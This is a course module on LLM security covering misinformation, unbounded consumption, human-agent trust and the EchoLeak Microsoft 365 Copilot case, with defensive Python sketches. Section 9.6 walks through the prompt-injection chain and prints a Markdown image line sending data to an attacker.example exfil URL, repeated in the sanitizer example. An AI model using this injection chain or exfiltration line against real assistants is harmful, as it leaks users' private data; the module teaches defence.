Module 9: Misinformation + Unbounded Consumption + EchoLeak -- LLM09 + LLM10:2025

Duration: 2 hr lecture + 4 hr lab + 5 hr independent
Lab: Lab 9 (Token-Spam DoS Observation + EchoLeak Case Study)
OWASP anchor: LLM09:2025 Misinformation / LLM10:2025 Unbounded Consumption / ASI07:2026 Goal Drift / ASI09:2026 Human-Agent Trust Exploitation / ASI10:2026 Rogue Agents
Case study: EchoLeak (CVE-2025-32711, arXiv 2509.10540) -- assigned reading before lecture


9.1 LLM09:2025 -- Misinformation

Misinformation is the only OWASP LLM entry that does not require an attacker. The model generates false information on its own. This makes it different from all other Top 10 entries, which require some form of adversarial input.

Hallucination mechanics. LLMs generate each next token by sampling from a probability distribution learned from the training data. When asked about facts that are sparse or absent in that data (recent events, obscure topics, domain-specific details), the model has no built-in signal that it "doesn't know" -- it simply continues generating plausible-sounding tokens. The result is confident-sounding but factually incorrect output.

Why this is a security issue:

  • A security practitioner relying on an LLM to identify CVEs may get plausible-sounding but incorrect CVE descriptions
  • An LLM-generated code review may claim code is secure when it is not
  • An AI-generated legal document may contain false citations or incorrect regulatory requirements
  • In medical, financial, or safety-critical applications, LLM misinformation can cause direct harm

Confabulation vs. hallucination: In the literature these terms overlap, but a useful distinction is this: hallucination is generating false factual claims, while confabulation is generating plausible narratives that fill gaps in knowledge with invented but coherent-sounding content. Both arise from the same underlying mechanism (next-token prediction), but confabulation is harder to detect because it is internally consistent.


9.2 Misinformation in Security Contexts

CVE confabulation. LLMs trained on NVD data and security research will sometimes generate "CVEs" that don't exist, or describe real CVEs with incorrect details (wrong CVSS score, wrong affected version, invented PoC). For security practitioners, this is a reliability problem: you cannot cite an LLM CVE description without independent verification.
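One way to make the "independent verification" step concrete is to extract every CVE identifier from a model's draft and compare it against a set of IDs already confirmed in an authoritative source. The sketch below is illustrative only: the function name `unverified_cves`, the `verified` set, and the sample draft are assumptions, and the second ID in the draft is a made-up placeholder. It checks only that an ID is known, not that the description attached to it is correct.

```python
import re

# CVE IDs have the form CVE-<4-digit year>-<4 or more digits>.
CVE_PATTERN = re.compile(r"\bCVE-\d{4}-\d{4,}\b")


def unverified_cves(llm_text: str, verified_ids: set[str]) -> list[str]:
    """Return CVE IDs mentioned in llm_text that are absent from verified_ids."""
    mentioned = CVE_PATTERN.findall(llm_text)
    # dict.fromkeys removes duplicates while keeping first-seen order.
    unique = dict.fromkeys(mentioned)
    return [cve for cve in unique if cve not in verified_ids]


# Hypothetical verified set; in practice it would be built from an
# authoritative feed that a human or pipeline has already checked.
verified = {"CVE-2025-32711"}
draft = "EchoLeak is CVE-2025-32711. A related issue is CVE-2025-99999."

print(unverified_cves(draft, verified))
```

Anything the function returns should be treated as unverified until someone looks it up; an empty result still says nothing about whether the CVSS score or affected versions in the draft are right.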

Code security false-positives and false-negatives. Code review LLMs both miss real vulnerabilities (false negatives) and flag non-existent vulnerabilities (false positives). The false confidence problem: an LLM that says "this code is secure" provides false assurance. Practitioners should use LLMs as a first-pass screen, not a final verdict.

Adversarial misinformation. An attacker can deliberately prompt an LLM to generate false security advisories, fake CVEs, or misleading threat intelligence. If the output is published without verification, it pollutes the information environment.

ASI07:2026 Goal Drift. In agentic systems, the model accumulates context over a long task. As the context grows, the goal the model is effectively pursuing can drift from the initial task, because the original instructions compete with an ever-larger volume of intermediate results and tool output. The agent may start "optimizing" toward a subtly different objective than the one specified. This is an AI-safety concern at the foundational level; in AI-101 we treat it as a prompt hygiene issue (shorter, more focused contexts drift less).


9.3 Defenses Against Misinformation

Grounding via RAG. Retrieval-augmented generation anchors model responses to specific retrieved documents. When the model is forced to cite its sources, hallucination rates drop because the model's output is constrained by the retrieved text. RAG does not eliminate hallucination but significantly reduces it for factual claims.

Citation requirements. Prompt engineering that requires the model to cite a source for every factual claim. Claims without retrievable sources can be flagged as unverified.
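A citation requirement is only useful if something checks it. The following is a minimal sketch, assuming the model was prompted to mark sources as bracketed numbers such as `[1]` and that the application knows which source IDs were actually retrieved. The function name `flag_uncited`, the citation format, and the sample answer are all assumptions made for illustration.

```python
import re

CITATION = re.compile(r"\[(\d+)\]")


def flag_uncited(answer: str, source_ids: set[int]) -> list[str]:
    """Return sentences that cite nothing, or cite an ID that was never retrieved."""
    # Naive sentence split: break on whitespace that follows ., ! or ?
    sentences = [s.strip() for s in re.split(r"(?<=[.!?])\s+", answer) if s.strip()]
    flagged = []
    for sentence in sentences:
        cited = {int(n) for n in CITATION.findall(sentence)}
        # Flag when there is no citation, or when any cited ID is unknown.
        if not cited or not cited <= source_ids:
            flagged.append(sentence)
    return flagged


answer = (
    "The flaw was patched server-side [1]. "
    "It affects every tenant. "
    "Exploits are public [3]."
)
print(flag_uncited(answer, source_ids={1, 2}))
```

The check confirms that a citation exists and points at a retrieved source. It does not confirm that the source supports the claim, so flagged and unflagged sentences alike may still need human review in high-stakes settings.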

Output temperature reduction. Lower sampling temperature (closer to greedy/deterministic decoding) reduces hallucination frequency because the model concentrates on its highest-probability continuations rather than exploring low-probability ones. It does not help when the highest-probability continuation is itself wrong. Tradeoff: lower temperature also reduces creativity and can increase repetition.
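The effect of temperature can be seen directly on a toy distribution. The sketch below applies the standard temperature-scaled softmax to three made-up logits; the logit values and the function name are illustrative assumptions, not taken from any particular model.

```python
import math


def softmax_with_temperature(logits: list[float], temperature: float) -> list[float]:
    """Convert logits to probabilities after dividing by the temperature."""
    if temperature <= 0:
        raise ValueError("temperature must be positive")
    scaled = [x / temperature for x in logits]
    peak = max(scaled)  # subtract the max for numerical stability
    exps = [math.exp(x - peak) for x in scaled]
    total = sum(exps)
    return [e / total for e in exps]


logits = [2.0, 1.0, 0.0]  # toy scores for three candidate tokens
for t in (1.0, 0.5, 0.2):
    probs = softmax_with_temperature(logits, t)
    print(f"T={t}: {[round(p, 3) for p in probs]}")
```

As the temperature falls, probability mass moves toward the top-scoring token and away from the tail, which is why low-probability (and often less reliable) continuations are sampled less often.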

Verification pipeline. For high-stakes applications, treat LLM output as a draft and verify facts against authoritative sources before publishing or acting. This moves the human back into the loop for the verification step.

Domain-specific fine-tuning. A model fine-tuned on high-quality domain-specific data (e.g., NVD + security research papers) will hallucinate less on that domain. But fine-tuning is expensive and introduces LLM04 (poisoning) risk if the fine-tune data is not carefully curated.


9.4 LLM10:2025 -- Unbounded Consumption

LLM10 covers attacks that cause excessive resource consumption -- denial of service, cost inflation, or system degradation via input manipulation.

Token-spam DoS. An attacker sends a large number of API requests with long input prompts. Cost amplification: if the attacker uses the free/public tier of a service, they can force the operator to incur API costs far exceeding the attacker's own costs.

Sponge attacks. Crafted inputs that maximize the model's context window usage and force maximum-length output. Because output is billed per token, a minimal input prompt that causes the model to generate 4,096 tokens of output costs roughly 80x (4,096 / 50 ≈ 82) what a prompt that generates 50 tokens costs in output charges.
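The cost ratio quoted above follows from simple arithmetic when output is billed per token. The sketch below uses a hypothetical price per 1,000 output tokens; the price is an assumption and cancels out of the ratio, so only the token counts matter.

```python
# Hypothetical price; real per-token prices vary by provider and model.
PRICE_PER_1K_OUTPUT_TOKENS = 0.03  # assumed, in dollars


def output_cost(output_tokens: int, price_per_1k: float = PRICE_PER_1K_OUTPUT_TOKENS) -> float:
    """Cost of one response, counting output tokens only."""
    return output_tokens / 1000 * price_per_1k


long_cost = output_cost(4096)   # sponge-style maximum-length response
short_cost = output_cost(50)    # ordinary short response
ratio = long_cost / short_cost  # 4096 / 50

print(f"long: ${long_cost:.5f}  short: ${short_cost:.5f}  ratio: {ratio:.2f}")
```

The same ratio applies to every request the attacker sends, which is why capping output length is one of the cheapest mitigations.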

Recursion and self-reference. Inputs that cause the model to loop (in an agentic context) or to generate increasingly long outputs as part of a chain. Example: "Write a story about a story about a story about..." can cause runaway generation in some models or frameworks.
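In an agentic loop, the usual guard against runaway recursion is a hard step budget. The following is a minimal sketch under stated assumptions: `run_agent`, `StepBudgetExceeded`, and the `step` callback are hypothetical names, and the callback stands in for whatever function asks the model for the next sub-task.

```python
from typing import Callable, Optional


class StepBudgetExceeded(RuntimeError):
    """Raised when the agent has not finished within its step budget."""


def run_agent(
    step: Callable[[str], Optional[str]],
    task: str,
    max_steps: int = 8,
) -> list[str]:
    """Call step repeatedly; step returns the next sub-task, or None when done."""
    trace = []
    current = task
    for _ in range(max_steps):
        trace.append(current)
        next_task = step(current)
        if next_task is None:
            return trace  # the agent finished within budget
        current = next_task
    raise StepBudgetExceeded(f"no result after {max_steps} steps")


# A self-referential "planner" that never terminates on its own.
def runaway(task: str) -> Optional[str]:
    return "a story about " + task


try:
    run_agent(runaway, "a story", max_steps=5)
except StepBudgetExceeded as exc:
    print("stopped:", exc)
```

The budget turns an unbounded loop into a bounded, observable failure. Choosing the value of `max_steps` is a judgment call that depends on the task.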

Resource exhaustion via complexity. Chain-of-thought prompting and complex reasoning increase computational cost per token. An input carefully crafted to maximize the model's reasoning steps (e.g., adversarial math problems) costs more to process than a simple query.


9.5 Defenses Against Unbounded Consumption

Rate limiting. Standard API rate limiting by IP, user, or API key. Bursts above a per-session token budget trigger delays or rejections.
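A token budget per key can be sketched as a sliding-window counter. Everything here is an illustrative assumption rather than a specific product's behavior: the class name `TokenBudgetLimiter`, the window size, and the budget values. A production deployment would normally keep this state in a shared store instead of process memory.

```python
import time
from collections import defaultdict, deque


class TokenBudgetLimiter:
    """Allow at most max_tokens per key within a sliding time window."""

    def __init__(self, max_tokens: int, window_seconds: float, clock=time.monotonic):
        self.max_tokens = max_tokens
        self.window_seconds = window_seconds
        self.clock = clock  # injectable so the limiter can be tested
        self._events = defaultdict(deque)  # key -> deque of (timestamp, tokens)

    def allow(self, key: str, tokens: int) -> bool:
        now = self.clock()
        events = self._events[key]
        # Drop usage records that have aged out of the window.
        while events and now - events[0][0] >= self.window_seconds:
            events.popleft()
        used = sum(count for _, count in events)
        if used + tokens > self.max_tokens:
            return False  # caller should delay or reject the request
        events.append((now, tokens))
        return True


limiter = TokenBudgetLimiter(max_tokens=1000, window_seconds=60)
print(limiter.allow("api-key-1", 600))  # within budget
print(limiter.allow("api-key-1", 600))  # would exceed 1000 in the window
```

Keying on the API key or user rather than on the IP address alone makes the limit harder to sidestep by rotating addresses.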

Token budget enforcement. Hard limit on max_tokens in every API call. Never allow the application to pass unbounded max_tokens.

Input length limits. Reject inputs above a character/token threshold. Simple and effective against naive attacks.
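The output budget and the input length limit can both be enforced in a single request-building step, so that no code path reaches the model API without them. This is a sketch under stated assumptions: the thresholds, the `BoundedRequest` type, and `build_request` are hypothetical, and the character count stands in for a real tokenizer-based check.

```python
from dataclasses import dataclass
from typing import Optional

MAX_INPUT_CHARS = 8_000       # assumed input threshold
MAX_OUTPUT_TOKENS = 512       # assumed hard ceiling on output
DEFAULT_OUTPUT_TOKENS = 256   # used when the caller gives no value


class InputTooLong(ValueError):
    """Raised when the prompt exceeds the configured input limit."""


@dataclass(frozen=True)
class BoundedRequest:
    prompt: str
    max_tokens: int


def build_request(prompt: str, requested_max_tokens: Optional[int] = None) -> BoundedRequest:
    """Reject oversized input and clamp max_tokens to a fixed range."""
    if len(prompt) > MAX_INPUT_CHARS:
        raise InputTooLong(f"prompt has {len(prompt)} chars; limit is {MAX_INPUT_CHARS}")
    requested = DEFAULT_OUTPUT_TOKENS if requested_max_tokens is None else requested_max_tokens
    # Clamp into [1, MAX_OUTPUT_TOKENS] so the value is never unbounded.
    bounded = max(1, min(requested, MAX_OUTPUT_TOKENS))
    return BoundedRequest(prompt=prompt, max_tokens=bounded)


print(build_request("Summarize this advisory.", requested_max_tokens=100_000))
```

Clamping rather than rejecting an oversized `max_tokens` is a design choice; rejecting outright is equally defensible and makes misuse more visible in logs.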

Async timeout. Set a wall-clock timeout on all API calls. If the model has not finished generating in N seconds, cancel the request.
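With Python's `asyncio`, a wall-clock timeout can be applied with `asyncio.wait_for`, which cancels the awaited call once the deadline passes. In the sketch below, `slow_model_call` is a stand-in that only sleeps; it is an assumption used in place of a real provider client, and the delay and timeout values are arbitrary.

```python
import asyncio
from typing import Optional


async def slow_model_call(prompt: str, delay: float) -> str:
    """Stand-in for a real model API call; sleeps to simulate generation time."""
    await asyncio.sleep(delay)
    return f"response to: {prompt}"


async def call_with_timeout(prompt: str, delay: float, timeout_s: float) -> Optional[str]:
    """Return the response, or None if it did not arrive within timeout_s."""
    try:
        return await asyncio.wait_for(slow_model_call(prompt, delay), timeout=timeout_s)
    except asyncio.TimeoutError:
        # wait_for has already cancelled the pending call at this point.
        return None


print(asyncio.run(call_with_timeout("hello", delay=0.01, timeout_s=1.0)))
print(asyncio.run(call_with_timeout("hello", delay=0.5, timeout_s=0.05)))
```

Cancelling locally does not by itself guarantee that the provider stops generating or billing, so the timeout works best alongside a hard `max_tokens` limit.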

Cost monitoring. Set spend alerts at the provider level. Major providers such as AWS, OpenAI, and Anthropic offer some form of budget or usage alerting, though the available granularity differs by provider. If spend exceeds a threshold, page on-call.


9.6 EchoLeak: Case Study in Production AI Exploitation

EchoLeak (CVE-2025-32711) is the first documented real-world case of prompt injection being weaponized for concrete data exfiltration in a production AI system. CVSS 9.3 (Critical). Disclosed June 2025, patched by Microsoft server-side.

The target: Microsoft 365 Copilot -- an AI assistant with access to the user's email, OneDrive files, SharePoint content, Teams messages, and calendar.

The attack chain:

Step 1: Payload delivery. Attacker sends the victim a crafted email or shares a document containing hidden instructions. The instructions are embedded as white text on a white background or in a comment field, invisible to the human reader.

Step 2: XPIA classifier bypass. Microsoft deployed an "XPIA" (Cross Prompt Injection Attempt) classifier that analyzed Copilot's context for injection patterns. The attackers crafted their instructions to avoid the classifier's detection patterns.

Step 3: Link redaction bypass. Copilot's output filtering redacted suspicious links. The attackers used reference-style Markdown ([text][1] with the URL defined elsewhere) to evade the link-redaction filter.

Step 4: Image exfiltration channel. The payload instructed Copilot to include in its response a Markdown image tag pointing to the attacker's server: ![x](https://attacker.example.com/exfil?data=EXFILTRATED_CONTENT). When Copilot returned this response, the victim's browser fetched the image URL, sending the encoded data to the attacker.

Step 5: CSP bypass via Teams proxy. Microsoft Teams allowed images to be loaded via a Microsoft-controlled proxy (to avoid mixed-content warnings). This proxy was in the Copilot CSP allow-list. The attacker's image URL, when fetched via the Teams proxy, still delivered the data to the attacker's server.
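Steps 3 and 4 suggest why an output filter has to handle reference-style Markdown as well as inline links and images. The sketch below is not Microsoft's filter and makes no claim about how the real one worked. It is a simplified illustration in which `ALLOWED_HOSTS`, the regular expressions, and the function names are all assumptions: it first shows that an inline-only pattern misses a reference-style image, then strips any link, image, or reference definition whose host is not allow-listed.

```python
import re
from urllib.parse import urlparse

ALLOWED_HOSTS = {"contoso.example"}  # hypothetical allow-list

# Inline form: [text](url) or ![alt](url)
INLINE = re.compile(r"!?\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")
# Reference definition on its own line: [label]: url
REF_DEF = re.compile(
    r"^[ \t]{0,3}\[([^\]]+)\]:[ \t]*<?(\S+?)>?(?:[ \t].*)?$", re.MULTILINE
)


def host_allowed(url: str) -> bool:
    """True only for absolute URLs whose host is on the allow-list."""
    host = urlparse(url).hostname
    return host is not None and host in ALLOWED_HOSTS


def sanitize_markdown(text: str) -> str:
    """Remove links and images that point at hosts outside the allow-list."""

    def inline_sub(match: re.Match) -> str:
        # Keep allowed links; otherwise keep only the visible text.
        return match.group(0) if host_allowed(match.group(2)) else match.group(1)

    def ref_sub(match: re.Match) -> str:
        # Dropping the definition leaves [text][1] as inert literal text.
        return match.group(0) if host_allowed(match.group(2)) else ""

    return REF_DEF.sub(ref_sub, INLINE.sub(inline_sub, text))


payload = "Summary.\n\n![x][1]\n\n[1]: https://attacker.example/exfil?data=SECRET\n"
print(INLINE.search(payload))      # None: an inline-only filter sees nothing
print(sanitize_markdown(payload))  # the attacker URL is gone
```

An allow-list like this is only as strong as its entries. If an allow-listed host will fetch arbitrary URLs on request, as the Teams proxy did in Step 5, the filter passes the request and the data still leaves.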

Why this is significant:

  • Zero-click: victim does not need to do anything other than receive an email and open Copilot
  • Data exfiltrated: anything within Copilot's access scope -- all emails, all OneDrive files, all Teams messages
  • Defense layers bypassed: four separate defenses (XPIA classifier, link redaction, CSP, SSRF protection) were bypassed via a chained exploit

Structural lessons:

  1. Defense layers deployed independently can be bypassed by chaining
  2. IDOR + prompt injection is a dangerous combination: the model can access data across trust boundaries (other users' data, system data) and can be prompted to exfiltrate it
  3. The CSP that was meant to block external exfiltration itself contained the bypass: the allow-listed Teams proxy

9.7 ASI09:2026 -- Human-Agent Trust Exploitation

ASI09 describes how attackers exploit the trust that humans place in AI agents. As AI agents gain authority and autonomy in workflows, humans begin to trust their outputs without scrutiny.

Anthropomorphism bias. Users anthropomorphize AI agents -- they attribute intent, trustworthiness, and authority to the agent based on its fluent language production. An agent that communicates confidently in natural language appears trustworthy even when it is acting against the user's interests.

Authority exploitation. An agent that has been used reliably for months is trusted without scrutiny. An attacker who can inject into that agent's context can leverage the accumulated trust to cause the user to approve harmful actions.

Automation bias. Users systematically over-trust automated systems. If a Copilot agent says "I have summarized your security findings," the user is less likely to read them carefully than if a human analyst said the same thing.

Defense: maintain human oversight for all consequential decisions. "Human-in-the-loop" is not just a safety principle -- it is the structural defense against ASI09.
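Structurally, human-in-the-loop means the agent cannot execute a consequential action without an explicit approval step. The sketch below is a deliberately small illustration: the action names in `CONSEQUENTIAL`, the `execute_action` function, and the `approve` callback are hypothetical and do not come from any specific agent framework.

```python
from typing import Callable

# Hypothetical set of actions that must never run without a human decision.
CONSEQUENTIAL = {"send_email", "delete_file", "share_document"}


def execute_action(
    name: str,
    run: Callable[[], str],
    approve: Callable[[str], bool],
) -> str:
    """Run the action, asking a human first if it is consequential."""
    if name in CONSEQUENTIAL and not approve(name):
        return f"blocked: {name} requires human approval"
    return run()


# In a real system approve() would prompt a person; here it always declines.
def deny_all(action_name: str) -> bool:
    return False


print(execute_action("read_calendar", lambda: "calendar read", deny_all))
print(execute_action("send_email", lambda: "email sent", deny_all))
```

The gate only helps if the approval prompt shows the human what will actually happen (recipient, content, scope). An approval dialog that users click through by habit reintroduces the automation bias described above.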


9.8 Module 9 Summary

Concept                           Key takeaway
LLM09 misinformation              Hallucination is the model's default for out-of-distribution facts; no attacker required
Security-specific misinformation  CVE confabulation; code security false assurance; adversarial fake advisories
RAG as mitigation                 Grounding to sources reduces (but does not eliminate) hallucination
LLM10 unbounded consumption       Token-spam DoS; sponge attacks; rate limiting + max_tokens as defense
EchoLeak                          Zero-click prompt injection + IDOR + exfiltration; chained bypass of 4 defenses
ASI09                             Human trust in AI agents is an attack surface; maintain human oversight

Reading for Module 10

  • Christian, The Alignment Problem, Ch 1 "Prophecy" (Module 10 forward-pointer; deep dive in AI-301)
  • Review the open-source LangChain agent you will threat-model (CAPSTONE.md specifies the target)
  • D8 methodology review: AI-101-OUTLINE.md Section "Learning Outcomes" #8